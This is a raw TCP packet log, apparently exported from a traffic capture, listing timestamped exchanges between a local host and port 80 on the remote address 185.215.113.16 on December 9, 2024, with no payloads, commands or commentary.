                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.801256895 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.801316023 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.801387072 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.801424026 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.802582979 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.802625895 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.802795887 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.802897930 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.803932905 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.804001093 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.804052114 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.804086924 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.805191040 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.805233955 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.805366993 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.805408001 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.806476116 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.806519985 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.806747913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.806826115 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.807842016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.807900906 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.807981968 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.808047056 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.808993101 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.809031010 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.809112072 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.809146881 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.810324907 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.810364962 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.810460091 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.810492992 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.811503887 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.811547041 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.811630964 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.811691046 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.812763929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.812804937 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.812949896 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.813014030 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.814162016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.814224005 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.814383030 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.814452887 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.815377951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.815764904 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.815824032 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.816730022 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.816775084 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.816850901 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.816925049 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.817935944 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.818016052 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.818442106 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.818511009 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.819402933 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.819457054 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.819698095 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.819739103 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.820621014 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.820694923 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.820806026 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.820914984 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.821979046 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.822024107 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.822185993 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.822232008 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.823108912 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.823158026 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.823817015 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.823872089 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.824322939 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.824495077 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.824723005 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.824763060 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.825575113 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.825637102 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.825853109 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.825939894 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.826992989 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.827039957 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.827178001 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.827214956 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.828339100 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.828385115 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.828587055 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.828821898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.829518080 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.829557896 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.829821110 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.829947948 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.830729961 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.830794096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.831078053 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.831120014 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.831994057 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.832055092 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.832201004 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.832252979 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.833326101 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.833393097 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.833530903 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.833642006 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.834616899 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.834695101 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.835180044 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.835258961 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.835880995 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.835983038 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.836025000 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.836062908 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.837204933 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.837260962 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.837831974 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.837868929 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.838557005 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.838599920 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.838771105 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.838813066 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.839663982 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.839704990 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.872679949 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.872731924 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.962909937 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.963078022 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.963145018 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.963406086 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.963550091 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.963601112 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.964484930 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.964534044 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.964782000 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.964828968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.965558052 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.966032982 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.966084003 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.966743946 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.966787100 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.967535019 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.967591047 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.967725992 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.967736959 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.967772007 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.968777895 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.968815088 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.969300985 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.969391108 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.969885111 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.969923973 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.970180988 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.970225096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.971261024 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.971369028 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.971412897 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.972094059 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.972235918 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.972289085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.973252058 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.973356009 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.973398924 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.973436117 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.974208117 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.974251986 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.974375963 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.974433899 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.975292921 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.975492001 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.975534916 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.976432085 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.976470947 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.976521969 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.976563931 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.977514982 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.977554083 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.977804899 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.977843046 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.978585005 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.978629112 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.978693962 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.978940964 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.979628086 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.979679108 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.980163097 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.980199099 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.980671883 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.980772018 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.980806112 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.980896950 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.981837988 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.981899977 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.982178926 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.982577085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.982881069 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.982923031 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.983001947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.983037949 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.983973980 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.984024048 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.984246016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.984435081 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.985090017 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.985132933 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.985289097 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.985349894 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.986157894 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.986197948 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.986701012 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.986740112 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.987205029 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.987500906 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.987540007 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.988261938 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.988300085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.988419056 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.988473892 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.989356041 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.989392996 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.989609957 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.989649057 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.990426064 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.990468025 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.990644932 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.990812063 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.991528988 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.991708994 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.991765976 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.992624998 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.992798090 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.992844105 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.993807077 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.993853092 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.993932962 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.993972063 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.994796991 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.994891882 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.994956970 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.994998932 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.996026039 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.996159077 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.996196985 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.996264935 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.996931076 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.997519016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.997581005 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.998001099 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.998043060 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.998120070 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.998159885 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.999115944 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.999789953 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.999849081 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.000149012 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.000206947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.000248909 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.001307964 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.001534939 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.001611948 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.001671076 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.002372980 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.002424002 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.002486944 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.002532959 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.003448963 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.003549099 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.003575087 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.003624916 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.004492044 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.004534960 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.004663944 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.004733086 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.005624056 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.005692959 CET4996980192.168.2.6185.215.113.16
